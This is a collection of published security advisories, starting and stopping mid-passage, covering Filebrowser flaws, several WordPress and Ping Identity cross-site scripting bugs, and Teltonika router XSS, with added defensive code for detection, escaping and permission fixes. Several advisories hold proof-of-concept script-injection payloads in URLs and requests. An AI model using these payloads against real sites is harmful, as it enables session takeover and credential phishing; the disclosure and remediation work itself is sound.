Referer: http://filebrowser.local:8080/files/testdir/
Cookie: auth=eyJh[...]_r4EQ
[...]
```

This also happens when a new *command session* is started:

```http
GET /api/command/?auth=eyJh[...]YW8BA HTTP/1.1
Host: filebrowser.local:8080
Sec-WebSocket-Version: 13
Origin: http://filebrowser.local:8080
Sec-WebSocket-Key: oqQMrF7R34D3lAkj1+ZHTw==
Cookie: auth=eyJh[...]YW8BA
Upgrade: websocket
[...]
```

## Recommended Countermeasures ##

Sensitive data like session tokens or user credentials should be transmitted
via HTTP headers or the HTTP body only, never in the URL.
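Added example, not part of the advisory: a Python scan over constructed web-server access-log lines modelled on the two requests above. It flags query parameters that carry a token (by a credential-like name such as `auth`, or by JWT shape regardless of name), shows how to redact such values before a URL is written to a log, and shows the countermeasure of moving the token out of the query string into the `Cookie` header that the requests above already send. The log format, parameter names and the JWT value are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# A JWT is three base64url segments; the header segment starts with "eyJ"
# because it encodes '{"'.
JWT_RE = re.compile(r"eyJ[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+\.[A-Za-z0-9_-]+")
# Parameter names treated as secrets regardless of their value (assumption).
SECRET_PARAMS = {"auth", "token", "access_token", "jwt", "session", "password"}

# Combined log format: client ident user [time] "METHOD target PROTO" status size "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<agent>[^"]*)")?'
)


def _is_secret(name: str, value: str) -> bool:
    return name.lower() in SECRET_PARAMS or JWT_RE.fullmatch(value) is not None


def find_secrets_in_url(url: str):
    """Return (param, value) pairs in the query string that carry a secret."""
    return [(n, v) for n, v in parse_qsl(urlsplit(url).query, keep_blank_values=True)
            if _is_secret(n, v)]


def redact_url(url: str) -> str:
    """Replace secret query values so the URL can be logged safely."""
    parts = urlsplit(url)
    if not parts.query:
        return url
    cleaned = [f"{n}={'[REDACTED]' if _is_secret(n, v) else v}"
               for n, v in parse_qsl(parts.query, keep_blank_values=True)]
    return parts._replace(query="&".join(cleaned)).geturl()


def move_token_to_cookie(url: str, cookie_name: str = "auth"):
    """Countermeasure: strip the token from the URL and carry it in a header."""
    parts = urlsplit(url)
    kept, token = [], None
    for n, v in parse_qsl(parts.query, keep_blank_values=True):
        if _is_secret(n, v):
            token = v
        else:
            kept.append(f"{n}={v}")
    headers = {"Cookie": f"{cookie_name}={token}"} if token else {}
    return parts._replace(query="&".join(kept)).geturl(), headers


def scan_access_log(lines):
    """Detection: one finding per secret-bearing request target or Referer."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for url in (m["target"], m["referer"] or ""):
            for name, value in find_secrets_in_url(url):
                findings.append({"client": m["client"], "time": m["time"],
                                 "path": urlsplit(url).path, "param": name,
                                 "token_prefix": value[:8] + "..."})
    return findings


# Constructed sample: a fake, syntactically valid JWT and three log lines
# mirroring the file download and command-session requests in the advisory.
FAKE_JWT = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9.c2lnbmF0dXJl"
SAMPLE_LOG = [
    f'10.0.0.5 - - [27/Mar/2025:10:12:01 +0100] "GET /api/raw/testdir/testfile.txt?auth={FAKE_JWT} HTTP/1.1" 200 512 "http://filebrowser.local:8080/files/testdir/" "Mozilla/5.0"',
    f'10.0.0.5 - - [27/Mar/2025:10:12:03 +0100] "GET /api/command/?auth={FAKE_JWT} HTTP/1.1" 101 0 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [27/Mar/2025:10:13:10 +0100] "GET /files/testdir/?sort=name HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(finding)
    print(redact_url(f"/api/raw/testdir/testfile.txt?auth={FAKE_JWT}"))
    print(move_token_to_cookie(f"/api/command/?auth={FAKE_JWT}"))
```

The same `redact_url` step belongs in the reverse proxy or application logger; the detection only tells you which logs already hold tokens that should be revoked.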

## Timeline ##

* `2025-03-27` Identified the vulnerability in version 2.32.0
* `2025-04-11` Contacted the project
* `2025-04-29` Vulnerability disclosed to the project
* `2025-06-25` Uploaded advisories to the project's GitHub repository
* `2025-06-26` CVE ID assigned by GitHub
* `2025-06-26` Fix released with version 2.33.9
* `2025-06-26` Advisory published by project as `GHSA-rmwh-g367-mj4x`

## References ##

* CWE-598: Use of GET Request Method With Sensitive Query Strings:
* GitHub Security Advisory:

## Credits ##

* Mathias Tausig ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2019/SBA-ADV-20190305-01_Ping_Identity_Agentless_Integration_Kit_Reflected_XSS/README.md: --------------------------------------------------------------------------------

# Ping Identity Agentless Integration Kit Reflected Cross-site Scripting (XSS) #

## Vulnerability Overview ##

Ping Identity Agentless Integration Kit before 1.5 is susceptible to Reflected Cross-site Scripting at the `/as/authorization.oauth2` endpoint due to improper encoding of an arbitrarily submitted HTTP GET parameter name.

* **Identifier** : SBA-ADV-20190305-01
* **Type of Vulnerability** : Cross-site Scripting
* **Software/Product Name** : [Ping Identity Agentless Integration Kit](https://www.pingidentity.com/developer/en/resources/agentless-integration-kit-developers-guide.html)
* **Vendor** : [Ping Identity](https://www.pingidentity.com/)
* **Affected Versions** : < 1.5
* **Fixed in Version** : 1.5
* **CVE ID** : CVE-2019-13564
* **CVSSv3 Vector** : AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
* **CVSSv3 Base Score** : 6.1 (Medium)

## Vendor Description ##

> After authenticating the user (via a federated security token or
> authentication adapter), the user will be presented to the protected
> application via an SP adapter. This adapter provides the last-mile
> connection between the federation server (PingFederate) and the
> application, the user will be presented to the application which can
> then create a session and render the application for the
> authenticated user.

Source:

## Impact ##

By exploiting the documented vulnerability, an attacker can execute JavaScript code in a victim's browser within the origin of the target site. This can be misused, for example, for phishing attacks by displaying a fake login form in the context of the trusted site via JavaScript and then sending the victim's credentials to the attacker.

## Vulnerability Description ##

The `/as/authorization.oauth2` endpoint of PingFederate takes several HTTP GET parameter name-value pairs, which are subsequently rendered as an HTML form with hidden input fields.

```text
https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb
```

The name of the HTTP parameter is rendered as the `name` attribute of the corresponding input field, and the HTTP parameter value is rendered as the `value` attribute. The content of the `value` attribute is HTML-encoded and therefore not susceptible to XSS. However, the content of the `name` attribute is written to the HTML document without any encoding or sanitization.

## Proof of Concept ##

An attacker can exploit this vulnerability by ending the HTML attribute and element and then inserting, for example, a `script` tag.

```text
https://idp.example.com/as/authorization.oauth2?response_type=code&client_id=CLIENT&redirect_uri=https%3A%2F%2Fapp.example.com%2Fcb&%22%3E%3Cscript%3Ealert(1)%3C%2fscript%3E
```

The last parameter reads as follows when URL-decoded:

```html
"><script>alert(1)</script>
```

This leads to the following HTML response (shortened for readability):

```html
" value=""/>
```

## Recommended Countermeasures ##

We recommend HTML-encoding the parameter name the same way the parameter value is encoded.

## Timeline ##

* `2019-03-05` Identified the vulnerability in version < 1.5
* `2019-03-25` Contacted the vendor via support
* `2019-05-24` Finding review with Ping Identity and SBA Research
* `2019-07-11` Publication of CVE-2019-13564

## References ##

* [NIST NVD entry of CVE-2019-13564](https://nvd.nist.gov/vuln/detail/CVE-2019-13564)

## Credits ##

* Thomas Konrad ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2019/SBA-ADV-20190911-01_Easy_FancyBox_WP_Plugin_Stored_XSS/README.md: --------------------------------------------------------------------------------

# Easy FancyBox WordPress Plugin Stored Cross-site Scripting (XSS) #

## Vulnerability Overview ##

The Easy FancyBox WordPress Plugin version 1.8.17 is susceptible to Stored Cross-site Scripting in the Settings > Media admin page `/wp-admin/options-media.php` due to improper encoding of arbitrarily submitted setting parameters. The vulnerability affects every publicly accessible page of the WordPress site.

* **Identifier** : SBA-ADV-20190911-01
* **Type of Vulnerability** : Cross-site Scripting
* **Software/Product Name** : [Easy FancyBox](https://wordpress.org/plugins/easy-fancybox/)
* **Vendor** : [RavanH](https://status301.net/)
* **Affected Versions** : <= 1.8.17
* **Fixed in Version** : 1.8.18
* **CVE ID** : CVE-2019-16524
* **CVSS Vector** : CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N
* **CVSS Base Score** : 3.5 (Low)

## Vendor Description ##

> Easy FancyBox plugin for WordPress websites gives you a flexible and
> aesthetic light box solution for just about all media links on your website.
> Easy FancyBox uses an updated version of the traditional FancyBox jQuery
> extension and is WP 3+ Multi-Site compatible. After activation you can find
> a new section FancyBox on your Settings > Media admin page where you can
> manage the media light box options.

Source:

## Impact ##

By exploiting the documented vulnerability, an attacker can execute JavaScript code in a victim's browser within the origin of the target site. This can be misused, for example, to take over future administrative web management sessions.

## Vulnerability Description ##

Several parameters of the file `/inc/class-easyfancybox.php` are affected by stored cross-site scripting vulnerabilities. The file is a part of the Settings > Media admin page of the WordPress instance.

These setting parameters are embedded, without encoding or sanitization, in CSS blocks that are sent to the client's browser. The style sheet is sent along with every publicly accessible page, no matter whether the plugin is needed on the page or not.

For example, the following parameters are vulnerable:

* `/inc/class-easyfancybox.php`
  * fancybox_titleColor
  * fancybox_paddingColor

There are many more vulnerable parameters; the ones listed above are given only as examples.

The vulnerabilities are located in `/inc/class-easyfancybox.php`:

```php
[...]
if ( !empty($paddingColor) )
    $content_style .= 'border-color:'.$paddingColor.';';
[...]
if ( !empty($titleColor) )
    $styles .= '#fancybox-title,#fancybox-title-float-main{color:'.$titleColor.'}';
[...]
```

As the above code snippet shows, the parameters `$paddingColor` and `$titleColor` contain user input and are concatenated into `$content_style` and `$styles`, respectively, without any sanitization or escaping.

## Proof of Concept ##

An attacker with access to the Settings > Media page of the administrative portal can exploit this vulnerability by setting `$titleColor` to the following string:

```text
#44}
```

This leads to the following HTML response (shortened for readability):

```html
}
```

## Recommended Countermeasures ##

We recommend strictly whitelisting the user input before it is used. The only allowed characters should be alphanumeric characters and the hash sign.
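An added example, not the plugin's, WordPress's or Ping Identity's code: the Go functions below implement this countermeasure (only alphanumerics and `#` pass, and a setting that fails the check falls back to a default) together with the encoding fix recommended for the Ping Identity endpoint above, where both the `name` and the `value` attribute of a hidden input are HTML-escaped. The function names, the fallback colour and the sample inputs are assumptions constructed for the example.

```go
package main

import (
	"fmt"
	"html"
	"regexp"
)

// cssColorRe is the allowlist from the countermeasure above: alphanumeric
// characters and '#', nothing else. Without '}', ';', '<' or quotes a value
// cannot close the CSS rule or the <style> element it is embedded in.
var cssColorRe = regexp.MustCompile(`^[A-Za-z0-9#]+$`)

// ValidCSSColor reports whether a colour setting may be written into a
// stylesheet verbatim.
func ValidCSSColor(v string) bool {
	return cssColorRe.MatchString(v)
}

// TitleStyle builds the same rule as the quoted class-easyfancybox.php code,
// but substitutes fallback when the stored setting fails the allowlist.
func TitleStyle(titleColor, fallback string) string {
	if !ValidCSSColor(titleColor) {
		titleColor = fallback
	}
	return "#fancybox-title,#fancybox-title-float-main{color:" + titleColor + "}"
}

// HiddenInput renders a hidden form field with both the name and the value
// HTML-escaped and quoted, the fix recommended for the Ping Identity
// authorization endpoint: html.EscapeString rewrites <, >, &, ' and ".
func HiddenInput(name, value string) string {
	return `<input type="hidden" name="` + html.EscapeString(name) +
		`" value="` + html.EscapeString(value) + `"/>`
}

func main() {
	// Constructed inputs: a legitimate colour, the advisory's "#44}" prefix
	// and a value that would smuggle an extra CSS property.
	for _, c := range []string{"#ffffff", "#44}", "red;background:url(x)"} {
		fmt.Printf("%-24q valid=%-5v -> %s\n", c, ValidCSSColor(c), TitleStyle(c, "#ffffff"))
	}
	// The attribute-breaking parameter name from the Ping Identity case.
	fmt.Println(HiddenInput(`"><script>alert(1)</script>`, ""))
	fmt.Println(HiddenInput("redirect_uri", "https://app.example.com/cb"))
}
```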

## Timeline ##

* `2019-09-11` Identified the vulnerability in version 1.8.17
* `2019-09-11` Contacted the vendor via support
* `2019-09-16` Vendor closed the vulnerability in version 1.8.18
* `2019-09-25` Publication of CVE-2019-16524

## References ##

* [Easy Fancybox Plugin Page](https://wordpress.org/plugins/easy-fancybox/)

## Credits ##

* Jakob Hagl ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-05_Filebrowser_Bypass_Command_Execution_Allowlist/README.md: --------------------------------------------------------------------------------

# Filebrowser Command Execution Allowlist Bypass #

## Vulnerability Overview ##

The *Command Execution* feature of Filebrowser only allows the execution of shell commands which have been predefined on a user-specific allowlist. The implementation of this allowlist is erroneous, allowing a user to execute additional commands that are not permitted.

* **Identifier** : SBA-ADV-20250325-05
* **Type of Vulnerability** : Remote Code Execution
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.33.9
* **Fixed in Version** : 2.33.10
* **CVE ID** : CVE-2025-52995
* **CVSS Vector** : CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
* **CVSS Base Score** : 8.0 (High)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

A user can execute more shell commands than they are authorized for. The concrete impact of this vulnerability depends on the commands configured and the binaries installed on the server or in the container image. Due to the missing separation of *scopes* on the OS level, this could give an attacker access to all files managed by the application, including the Filebrowser database.

## Vulnerability Description ##

For a user to make use of the command execution feature, two things need to happen in advance:

1. An administrator needs to grant that account the `Execute commands` permission
2. The command to be executed needs to be listed in the `Commands` input field (also done by an administrator)

If a user tries to execute a different command, it gets rejected by the application.

The allowlist verification of a command happens in the function `CanExecute` in the file `users/users.go`:

```go
// CanExecute checks if an user can execute a specific command.
func (u *User) CanExecute(command string) bool {
	if !u.Perm.Execute {
		return false
	}

	for _, cmd := range u.Commands {
		if regexp.MustCompile(cmd).MatchString(command) {
			return true
		}
	}

	return false
}
```

This check employs a regular expression which does not test whether the issued command (`command`) is identical to a configured one (`cmd`, an element of the array `u.Commands`), but only whether the issued command contains an allowed one. As a consequence, a user who is only granted access to the `ls` command is also allowed to execute `lsof` and `lsusb`.

As a prerequisite, an attacker needs an account with the `Execute Commands` permission and some permitted commands.
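To make the difference concrete, here is an added Go comparison (not Filebrowser's code and not its actual patch) of the quoted check against an exact-match version, run over a constructed allowlist; the assumption that the check receives the full command line and compares its program name is mine, as is the second case showing what a regex metacharacter in the allowlist does to the vulnerable check.

```go
package main

import (
	"fmt"
	"regexp"
	"strings"
)

// canExecuteVulnerable reproduces the allowlist check quoted above: each
// configured command is compiled as a regular expression and MatchString
// succeeds on any substring match, so an entry "ls" admits "lsof" too.
func canExecuteVulnerable(allowed []string, command string) bool {
	for _, cmd := range allowed {
		if regexp.MustCompile(cmd).MatchString(command) {
			return true
		}
	}
	return false
}

// canExecuteFixed applies the exact-match rule from the countermeasures
// section. Assumption (an illustration, not Filebrowser's patch): the check
// receives the full command line and compares its program name, so "ls -la"
// stays permitted for an entry "ls" while "lsof" is rejected.
func canExecuteFixed(allowed []string, command string) bool {
	fields := strings.Fields(command)
	if len(fields) == 0 {
		return false
	}
	for _, cmd := range allowed {
		if cmd == fields[0] {
			return true
		}
	}
	return false
}

// Verdict holds the outcome of both checks for one command line.
type Verdict struct {
	Command    string
	Vulnerable bool
	Fixed      bool
}

// compare evaluates every command against the allowlist with both checks.
func compare(allowed []string, commands []string) []Verdict {
	out := make([]Verdict, 0, len(commands))
	for _, c := range commands {
		out = append(out, Verdict{c, canExecuteVulnerable(allowed, c), canExecuteFixed(allowed, c)})
	}
	return out
}

func main() {
	// Constructed configuration: the user may only run "ls".
	allowed := []string{"ls"}
	for _, v := range compare(allowed, []string{"ls", "ls -la", "lsof", "lsusb", "cat notes.txt"}) {
		fmt.Printf("%-14s vulnerable=%-5v fixed=%v\n", v.Command, v.Vulnerable, v.Fixed)
	}
	// A regex metacharacter in the allowlist widens the vulnerable check
	// even further: the entry "." matches every non-empty command.
	fmt.Println(`entry "." admits "cat notes.txt":`, canExecuteVulnerable([]string{"."}, "cat notes.txt"))
}
```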

## Proof of Concept ##

Grant a user the `Execute commands` permission and allow them to use only `ls` in the `Commands` field:

![User setup](images/allowlistbypass_configuration.png)

Afterwards, log in as that user, open a command execution window and execute `lsof` and `lsusb`:

![Exploitation](images/allowlistbypass_exploit.png)

## Recommended Countermeasures ##

The `CanExecute` function in the Filebrowser source code should be fixed to only allow exact matches of the command specified instead of doing partial matching. The correctness of this fix should be extensively tested in the application's automated test suite.

## Timeline ##

* `2025-03-25` Identified the vulnerability in version 2.32.0
* `2025-04-11` Contacted the project
* `2025-04-18` Vulnerability disclosed to the project
* `2025-06-25` Uploaded advisories to the project's GitHub repository
* `2025-06-26` CVE ID assigned by GitHub
* `2025-06-26` Fix released with version 2.33.10
* `2025-06-30` Advisory published by project as `GHSA-w7qc-6grj-w7r8`

## References ##

* GitHub Security Advisory:

## Credits ##

* Mathias Tausig ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2025/SBA-ADV-20250325-03_Filebrowser_Insecure_File_Permissions/README.md: --------------------------------------------------------------------------------

# Filebrowser Insecure File Permissions #

## Vulnerability Overview ##

The file access permissions for files uploaded to or created from Filebrowser are never explicitly set by the application. The same is true for the database used by Filebrowser.
On standard servers where the *umask* configuration has not been hardened, this makes all the stated files readable by any operating system account.

* **Identifier** : SBA-ADV-20250325-03
* **Type of Vulnerability** : Incorrect Default Permissions
* **Software/Product Name** : [Filebrowser](https://filebrowser.org/)
* **Vendor** : [Filebrowser](https://github.com/filebrowser)
* **Affected Versions** : <= 2.33.6
* **Fixed in Version** : 2.33.7
* **CVE ID** : CVE-2025-52900
* **CVSS Vector** : CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
* **CVSS Base Score** : 5.5 (Medium)

## Vendor Description ##

> filebrowser provides a file managing interface within a specified directory
> and it can be used to upload, delete, preview, rename and edit your files.
> It allows the creation of multiple users and each user can have its own
> directory. It can be used as a standalone app.

Source:

## Impact ##

The default permissions for new files on a standard Linux system are `0644`, making them world-readable. That means that at least the following parties have full read access to all files managed by Filebrowser from all *scopes*, as well as to its database (including the password hashes stored there):

* All OS accounts on the server
* All other applications running on the same server
* Any Filebrowser user with *Command Execution* privileges having access to a command that allows reading a file's content

## Vulnerability Description ##

On a Linux system, the file access permissions of new files are determined by the *umask* setting (system-wide by default), unless they are set explicitly by the creating application. Most distributions set this value to `022` by default, which gives every account on the system read permission on the file.

```bash
$ umask
022
$ touch foo
$ ls -l foo
-rw-r--r-- 1 sba sba 0 31. Mär 15:08 foo
```

## Proof of Concept ##

Upload or create a file in the Filebrowser GUI and list the directory contents from a shell:

```bash
$ ls -l /srv/filebrowser/testdir
total 12
-rw-r--r-- 1 sba sba 7703 Mar 25 16:07 dummy1.pdf
-rw-r--r-- 1 sba sba    3 Mar 25 15:46 testfile.txt
```

The same can be validated for Docker-based deployments within the container:

```bash
$ docker exec -it e0f075082a2c ls /srv/testdir -l
total 12
-rw-r--r-- 1 1000 1000 7703 Mar 25 15:07 dummy1.pdf
-rw-r--r-- 1 1000 1000    3 Mar 25 14:46 testfile.txt
```

Furthermore, the database used by the Filebrowser application is readable by any account:

```bash
$ ls -l /srv/filebrowser/filebrowser.db
-rw-rw-r-- 1 sba sba 65536 Mar 25 09:58 /srv/filebrowser/filebrowser.db
```

## Recommended Countermeasures ##

Since the system's *umask* configuration cannot be controlled by Filebrowser, the application needs to set the permissions of all new files explicitly upon creation. No permissions should be given to the *other* category.
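As an added Go example (not Filebrowser's code), the functions below show both halves of that recommendation: creating a file with explicit permissions that do not depend on the umask, and a remediation walk that strips the *other* bits from every entry of an existing data directory. File names and contents are constructed; the `0600` mode is stricter than the advisory requires, since it also withholds group access.

```go
package main

import (
	"fmt"
	"io/fs"
	"os"
	"path/filepath"
)

// privateFileMode grants nothing to the "other" category, as the advisory
// recommends; group bits are also withheld here, which is stricter.
const privateFileMode fs.FileMode = 0o600

// CreatePrivateFile creates path with privateFileMode and then applies
// os.Chmod: the mode passed to OpenFile is still filtered by the process
// umask, whereas Chmod sets the permission bits exactly.
func CreatePrivateFile(path string, data []byte) error {
	f, err := os.OpenFile(path, os.O_WRONLY|os.O_CREATE|os.O_TRUNC, privateFileMode)
	if err != nil {
		return err
	}
	if _, err := f.Write(data); err != nil {
		f.Close()
		return err
	}
	if err := f.Close(); err != nil {
		return err
	}
	return os.Chmod(path, privateFileMode)
}

// StripOtherBits walks root and removes read, write and execute for "other"
// from every file and directory, the same effect as a manual
// "chmod o-rwx -R" on an existing data directory. Symbolic links are left
// alone so that targets outside root are never touched. It returns the
// number of entries whose mode was changed.
func StripOtherBits(root string) (int, error) {
	changed := 0
	err := filepath.WalkDir(root, func(path string, d fs.DirEntry, err error) error {
		if err != nil {
			return err
		}
		info, err := d.Info()
		if err != nil {
			return err
		}
		if info.Mode()&fs.ModeSymlink != 0 {
			return nil
		}
		mode := info.Mode().Perm()
		if mode&0o007 == 0 {
			return nil
		}
		if err := os.Chmod(path, mode&^0o007); err != nil {
			return err
		}
		changed++
		return nil
	})
	return changed, err
}

// OtherBits returns the permission bits granted to "other" for path.
func OtherBits(path string) (fs.FileMode, error) {
	info, err := os.Lstat(path)
	if err != nil {
		return 0, err
	}
	return info.Mode().Perm() & 0o007, nil
}

func main() {
	// Constructed demonstration in a throwaway directory.
	dir, err := os.MkdirTemp("", "fb-perms-")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	private := filepath.Join(dir, "testfile.txt")
	if err := CreatePrivateFile(private, []byte("abc")); err != nil {
		panic(err)
	}
	// Mimic a file created without explicit permissions (0644 after a 022 umask).
	legacy := filepath.Join(dir, "dummy1.pdf")
	if err := os.WriteFile(legacy, []byte("%PDF"), 0o644); err != nil {
		panic(err)
	}
	n, err := StripOtherBits(dir)
	if err != nil {
		panic(err)
	}
	for _, f := range []string{private, legacy} {
		b, _ := OtherBits(f)
		fmt.Printf("%s: other=%#o\n", filepath.Base(f), b)
	}
	fmt.Println("entries changed:", n)
}
```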

Implementing this won't fix the permissions of existing files on active instances after an update, so site administrators will need to fix the permissions manually:

```bash
$ chmod o-rwx -R /srv/filebrowser/datadir
```

## Timeline ##

* `2025-03-25` Identified the vulnerability in version 2.32.0
* `2025-04-11` Contacted the project
* `2025-04-18` Vulnerability disclosed to the project
* `2025-06-25` Uploaded advisories to the project's GitHub repository
* `2025-06-26` CVE ID assigned by GitHub
* `2025-06-26` Fix released with version 2.33.7
* `2025-06-26` Advisory published by project as `GHSA-jj2r-455p-5gvf`

## References ##

* CWE-276: Incorrect Default Permissions:
* What is Umask and How To Setup Default umask Under Linux?:
* GitHub Security Advisory:

## Credits ##

* Mathias Tausig ([SBA Research](https://www.sba-research.org/))

-------------------------------------------------------------------------------- /2019/SBA-ADV-20190913-01_WordPress_Plugin_EU_Cookie_Law/README.md: --------------------------------------------------------------------------------

# WordPress Plugin - EU Cookie Law (GDPR) - Stored XSS #

## Vulnerability Overview ##

The eu-cookie-law plugin through 3.0.6 for WordPress (aka EU Cookie Law (GDPR)) is susceptible to Stored XSS due to improper encoding of several configuration options in the admin area and the displayed cookie consent message. This affects Font Color, Background Color, and the Disable Cookie text. An attacker with high privileges can attack other users.
10 | 11 | * **Identifier** : SBA-ADV-20190913-01 12 | * **Type of Vulnerability** : Cross-site Scripting 13 | * **Software/Product Name** : [EU Cookie Law (GDPR)](https://wordpress.org/plugins/eu-cookie-law/) 14 | * **Vendor** : [Alex Moss, Marco Milesi](https://wordpress.org/plugins/eu-cookie-law/) 15 | * **Affected Versions** : <= 3.0.6 and possibly upwards 16 | * **Fixed in Version** : - 17 | * **CVE ID** : CVE-2019-16522 18 | * **CVSSv3 Vector** : AV:N/AC:L/PR:H/UI:R/S:U/C:L/I:L/A:N 19 | * **CVSSv3 Base Score** : 3.5 (Low) 20 | 21 | ## Vendor Description ## 22 | 23 | > EU Cookie Law is a light, elegant and powerful solution to comply european cookie law and GDPR, with popup and options to lock scripts before acceptance. 24 | > 25 | > Various customizations included to perfectly fit your website and keep cookies under control (before and after the consent). 26 | > 27 | > Simply install the plugin and follow the instructions on the Settings page. 28 | 29 | Active Installations: 100,000+ 30 | 31 | Source: 32 | 33 | ## Impact ## 34 | 35 | By exploiting the documented vulnerability, an authenticated attacker with high 36 | privileges (admin) can execute JavaScript code in a victim's browser. 37 | This can be misused, e.g for phishing attacks by displaying a fake 38 | login form and sending the victim's credentials to the attacker. 39 | Furthermore malicious actions can be performed in the context of an authenticated 40 | user. The impact depends on the level of access of the attacked user. 41 | 42 | ## Vulnerability Description ## 43 | 44 | In the configuration area `/wp-admin/options-general.php?page=peadig_eucookie` 45 | an admin can set several options for the plugin. Most of them are correctly 46 | escaped before inserted in the HTML page. However three values of settings can 47 | be exploited to insert arbitrary JavaScript and HTML. 
48 | Those are: 49 | 50 | * Font Color 51 | * Background Color 52 | * "Disable Cookie" Text 53 | 54 | The value of "Fontcolor" will be inserted on every page where the cookie consent message 55 | is shown. The other two are by default only exploitable in the admin area. 56 | 57 | ## Proof of Concept ## 58 | 59 | This example shows how an attacker can exploit this vulnerability through the 60 | value of "Font Color": By setting the value `#FFFFFF">`, 61 | an attacker can break out of the HTML attribute and insert a `script` tag containing 62 | JavaScript. In this example a simple alert-popup-box will be shown. 63 | 64 | So when the attacker sends the following HTTP-Request: 65 | 66 | ```http 67 | POST /wp-admin/options.php HTTP/1.1 68 | [...] 69 | 70 | [...]peadig_eucookie%5Bfontcolor%5D=%23FFFFFF%22%3E%3Cscript%3Ealert%281%29%3C/script%3E[...] 71 | ``` 72 | 73 | In the admin area, the resulting HTML page looks like the following (shortened for readability): 74 | 75 | ```html 76 | [...] 77 | 78 | 79 | " class="color-field" data-default-color="#ffffff"/> 80 | [...] 81 | ``` 82 | 83 | On the page with the cookie message the payload will be inserted multiple times. 84 | The resulting HTML looks like the following (shortened for readability): 85 | 86 | ```html 87 | [...] 88 | 89 |
90 | 91 | ;background:rgb(0,0,0);background: rgba(0,0,0,0.85);"> 92 | [...] 93 | ``` 94 | 95 | ## Recommended Countermeasures ## 96 | 97 | We recommend to escape the values using the `esc_attr`-[function][1] provided by WordPress. 98 | 99 | [1]: https://developer.wordpress.org/themes/theme-security/data-sanitization-escaping/#escaping-securing-output 100 | 101 | ## Timeline ## 102 | 103 | * `2019-09-04` Identified the vulnerability 104 | * `2019-09-06` Contacted the authors 105 | * `2019-09-06` Response by authors about disclosure contact 106 | * `2019-09-09` Disclosed vulnerability to the authors 107 | * `2019-09-20` CVE assigned 108 | * `2019-09-20` Asked authors again for fix 109 | * `2019-10-16` Public disclosure, because authors did not respond 110 | 111 | ## References ## 112 | 113 | * 114 | * 115 | 116 | ## Credits ## 117 | 118 | * Tobias Fink ([SBA Research](https://www.sba-research.org/)) 119 | -------------------------------------------------------------------------------- /2018/SBA-ADV-20180410-01_Teltonika_Cross_Site_Scripting/README.md: -------------------------------------------------------------------------------- 1 | # Teltonika RUT9XX Reflected Cross-Site Scripting (XSS) # 2 | 3 | ## Vulnerability Overview ## 4 | 5 | Teltonika RUT9XX routers with firmware before 00.05.01.1 are prone to 6 | cross-site scripting vulnerabilities in `hotspotlogin.cgi` due to 7 | insufficient user input sanitization. 
8 | 9 | * **Identifier** : SBA-ADV-20180410-01 10 | * **Type of Vulnerability** : Cross Site Scripting 11 | * **Software/Product Name** : [Teltonika RUT955](https://teltonika.lt/product/rut955/) 12 | * **Vendor** : [Teltonika](https://teltonika.lt/) 13 | * **Affected Versions** : Firmware RUT9XX_R_00.05.00.5 and probably prior 14 | * **Fixed in Version** : RUT9XX_R_00.05.01.1 15 | * **CVE ID** : CVE-2018-17533 16 | * **CVSSv3 Vector** : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N 17 | * **CVSSv3 Base Score** : 8.2 (High) 18 | 19 | ## Vendor Description ## 20 | 21 | > RUT955 is a highly reliable and secure LTE router with I/O, GNSS and 22 | > RS232/RS485 for professional applications. Router delivers high 23 | > performance, mission-critical cellular communication and GPS location 24 | > capabilities. 25 | 26 | Source: 27 | 28 | ## Impact ## 29 | 30 | By exploiting the documented vulnerabilities, an attacker can execute 31 | JavaScript code in a user's browser within the origin of the router. 32 | The attacker might take over existing or future administrative web 33 | management sessions and gain access to the device. 34 | 35 | We recommend upgrading to version RUT9XX_R_00.05.01.1 or newer, which 36 | includes fixes for the vulnerabilities described in this advisory. 37 | 38 | ## Vulnerability Description ## 39 | 40 | Several parameters of the script `hotspotlogin.cgi` are affected by 41 | reflected cross-site scripting vulnerabilities. The scripts are part of 42 | the coova-chilli captive portal. However, in firmware versions before 43 | RUT9XX_R_00.04.233 the vulnerabilities are exploitable regardless of 44 | the device configuration, even if no captive portal is configured. 
45 | 46 | More concretely, the following parameters are vulnerable: 47 | 48 | * `/cgi-bin/hotspotlogin.cgi` 49 | * *If* res=failed or res=notyet 50 | * challenge 51 | * uamip 52 | * uamport 53 | * userurl 54 | 55 | The affected script outputs these input parameters in an HTML context 56 | without proper output encoding. 57 | 58 | The vulnerabilities are located in `hotspotlogin.cgi`: 59 | 60 | ```lua 61 | [...] 62 | elseif result == 2 or result == 5 then 63 | replace_tags.formHeader = [[
64 | 65 | 66 | 67 | 68 | ]] 69 | replace_tags.formFooter = [[
